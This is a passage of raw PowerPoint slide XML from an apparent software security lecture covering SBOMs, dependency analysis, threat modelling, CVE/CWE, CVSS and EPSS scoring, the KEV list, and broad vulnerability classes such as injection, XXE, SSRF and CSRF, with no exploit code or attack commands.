            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> supply chain attack? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>(Sept 2025)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C2E32-5348-BE3B-DFB4-461A0B98CE9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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" alt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FBF1E-318C-0149-6002-4654C5C2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85081"/>
            <a:ext cx="590632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SBOM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Software Bill of Materials (SBOM) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inventory of software components of some product</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>“a complete, formally structured list of components, libraries, and modules that are required to build (i.e. compile and link) a given piece of software and the supply chain relationships between them. These components can be open source or proprietary, free or paid, and widely available or restricted access”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1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800" dirty="0"/>
              <a:t>Goal: insight in supply chain &amp; dependencies,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 be aware of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attack surface </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>that the supply chain brings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 manage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>patching</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>US &amp; EU regulation is pushing to make SBOMs mandatory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1600" dirty="0"/>
              <a:t>Current state-of-the art: some companies are producing SBOMs,                        but nobody seems to be using other people’s SBOMs yet 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624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5D550-06DD-1220-2F21-3DA3F2B2E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BE7F0-FB3F-1D7C-1C40-6565965A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SCA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75C6F-9EBD-0DB1-5D5D-42AB9780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Software Composition Analysis (SCA) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tools statically </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>analyse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> code to recursively find all the dependencies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>effectively producing an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SBOM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to then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check for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>known CVEs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check for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>suspicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> poorly maintained code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1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How?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checking for unfixed bugs &amp; lack of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developer activity,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typo-squatting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...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Most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>organisations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> find that meeting the EU CRA requirement of ‘no known exploitable bugs’ is hard if they look at their dependencies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9A1F02-9878-B33B-47B4-AE3E2AC82F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865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0A3A-1216-0659-5991-969E9D9E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8022-7923-31C2-25B6-1FF3E8EC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700A-FAAF-93D7-06DF-DD86D4A76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For ‘proper’ threat modelling you’d also want to consider the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nature &amp; purpose </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>of the application 	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>i.e. not only think about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HOW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> an attacker could attack, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>but also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> an attacker would want to, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> they’d want to achieve, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> would want to attack</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2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Threat modelling involves an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attacker model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>that describes some  aspects of the attacker we’re worried about, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>eg.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008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>level of access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attack surface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>capabilities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8000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>skills &amp; resources</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>motivation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>    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4EA43-E883-413C-A069-85C56BA686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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" alt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90115CC-B853-675D-A5F9-55844A24ACB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="428625"/>
            <a:ext cx="7761288" cy="6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r>
              <a:rPr lang="en-GB" sz="2400" kern="0" dirty="0"/>
              <a:t>Observations about threat modelling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="143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1214438"/>
            <a:ext cx="7772400" cy="207054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altLang="nl-NL" sz="3200" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3200" dirty="0"/>
              <a:t>Classes of</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3200" dirty="0"/>
              <a:t>security vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="20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505200"/>
            <a:ext cx="6400800" cy="27781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>
              <a:solidFill>
                <a:srgbClr val="009900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  <a:p>
            <a:pPr marL="0" indent="0" algn="ctr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170575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Classifications &amp; rankings of security flaws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062664" cy="496014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Many proposals to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>categorise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rank</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> common security types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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" alt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3006" r="2301"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165160" y="2151976"/>
            <a:ext cx="2790113" cy="162714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129243"/>
            <a:ext cx="3339201" cy="175308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/>
          <a:srcRect b="9287"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5643472" y="2064781"/>
            <a:ext cx="1211037" cy="13642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28741" t="1" r="28535" b="-614"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248990" y="2605034"/>
            <a:ext cx="1164836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dirty="0"/>
              <a:t>SANS CWE Top 25     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>[2021]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4E722-E123-3868-FF92-A7DB8C525B41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1366296" y="6140043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https://cwe.mitre.org/top25/index.html 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62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CVE, CWE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4"/>
            <a:ext cx="7918648" cy="512365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CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- Common </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Enumeration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>                                                          https://cve.mitre.org</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CWE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> -  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Common </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Weakness </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Enumeration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0"/>
              <a:t>                                                                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>https://cwe.mitre.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>Here weakness = ‘bug category’, which is non-standard terminology </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="4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29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50" y="1196752"/>
            <a:ext cx="1058759" cy="2880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95" y="2276872"/>
            <a:ext cx="1056699" cy="3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sz="3200" dirty="0"/>
              <a:t>Threat modelling</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="3200" dirty="0"/>
            </a:b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434376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932C-F57B-3918-6C77-635EBB75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CVSS, EPSS , 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C961-0CCC-CBFC-C401-4912CCFE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CVSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is the score for the severity rating of a security flaw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current scheme is CVSS 4.0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NB  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CVSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>≠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risk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A high CVSS score in an application does not necessarily mean a high risk to your organisation!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Still, many organisations mistakenly use CVSS score to prioritise patches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Renewed interest in alternatives to CVSS in recent years,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notably </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EPSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>score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that tries to predict </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exploitability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r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Other, less popular alternatives: SSVC, VPR, ...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     </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1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18FF-DEE0-B605-5361-82BE7A76FF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2132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DE17C-E1E6-9148-FE73-706FF317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8279C-3B2A-785D-5377-07B43ED6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KEV list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6BD1C9-9127-66B2-243E-09278C58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4"/>
            <a:ext cx="7918648" cy="512365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KEV list </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Known </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Eploitable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 err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vulnernabilities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r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>subset of CVE list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those CVEs for which there is an exploit in the wild</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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https://www.cisa.gov/known-exploited-vulnerabilities-catalog</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000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marL="285750" defTabSz="9144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600" dirty="0"/>
              <a:t>Since 2022. ‘Only’ 1400 so far (Oct 2025)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" defTabSz="91440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altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" defTabSz="9144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altLang="en-US" sz="1600" dirty="0"/>
              <a:t>US government services have to patch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>mo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>st urgent vulnerabilities within 2 weeks,           </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>   least urgent within 6 months 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GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                  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E1A72E-E799-9859-20C5-79668DDEA8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8129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CWE Top 940 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>(or Top 1365?)   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>[Nov 2024]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See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://cwe.mitre.org/data/definitions/1000.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8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8103" r="50" b="8362"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="751799" y="1106092"/>
            <a:ext cx="2167793" cy="41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0427" r="50" b="6233"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4959307" y="1124106"/>
            <a:ext cx="2167793" cy="41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4212" r="50" b="3081"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2780106" y="1150468"/>
            <a:ext cx="2167793" cy="415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Tijdelijke aanduiding voor inhoud 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="-3174" t="17450" r="50" b="-240"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6976207" y="1160748"/>
            <a:ext cx="2167793" cy="41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5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sadsd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33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7484" y="-367243"/>
            <a:ext cx="14098968" cy="759248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1116632" y="6509822"/>
            <a:ext cx="50812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http://cwe.mitre.org/data/pdf/1000_with_1344_colors.pdf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="175252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Classifications of security flaws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062664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These classifications &amp; taxonomies are</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>very useful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for awareness &amp; prevention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for understanding &amp; tackling root causes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very messy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as you can classify flaws in different ways</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>always</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>incomplete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there are always new &amp; more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application-specific flaws will be missing in generic taxonomies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>can be misleading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e.g. ‘lack of input validation’ is often misnomer, as should be clear in next weeks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3461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Memory corruption? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="16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017B7248-1F1A-1E6B-258E-82BC0990AA6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03853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Memory corruption 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2189A8E0-8D35-39B6-6FEB-80FEC369C92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428789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FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection attacks?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US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69485FDF-AF58-F80F-BE16-FAF0F24C8B8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651687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FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF99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C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i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/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/>
              <a:t>C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/>
              <a:t>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106614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chemeClr val="tx1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FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Improper Restriction of XML External Entity Reference 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v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r-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/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/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/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/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/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/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/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/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F14856FB-32AE-A6C2-D498-C7CC8F32160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08800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008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Access control?  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(authentication + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authorisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) 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XML External Entity Reference </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(XXE)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/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Server-Side Request Forgery (SSRF)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EBFE20E7-AD0F-FF3A-31F3-CE187C2BD21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237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9803"/>
            <a:ext cx="5867400" cy="4788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276225"/>
            <a:ext cx="7761288" cy="685009"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" i="1" dirty="0"/>
              <a:t>How would you attack this website?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" baseline="-25000" dirty="0">
              <a:latin typeface="Pieces NFI" panose="02000000000000000000" pitchFamily="2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4A9004D-2E4E-45C3-A21A-70BF82E4DD2D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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Rechte verbindingslijn met pijl 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3301997" y="1669733"/>
            <a:ext cx="2779848" cy="212597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Rechte verbindingslijn met pijl 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2775127" y="3034340"/>
            <a:ext cx="3306718" cy="88536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 flipV="1">
            <a:off x="2987824" y="4165460"/>
            <a:ext cx="3094021" cy="5596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Rechte verbindingslijn met pijl 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1835696" y="4320532"/>
            <a:ext cx="4320480" cy="76465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5" name="Tekstvak 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6151933" y="3674201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sz="4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008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Access control?  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(authentication + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authorisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)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Cross-Site Request Forgery (CSRF)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00800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Improper Restriction of XML External Entity Reference (XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty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Server-Site Request Forgery (SSRF)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600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975D845D-72CF-5108-39FB-DE7CD89C501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155430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8086672" cy="989361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memory corruption, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
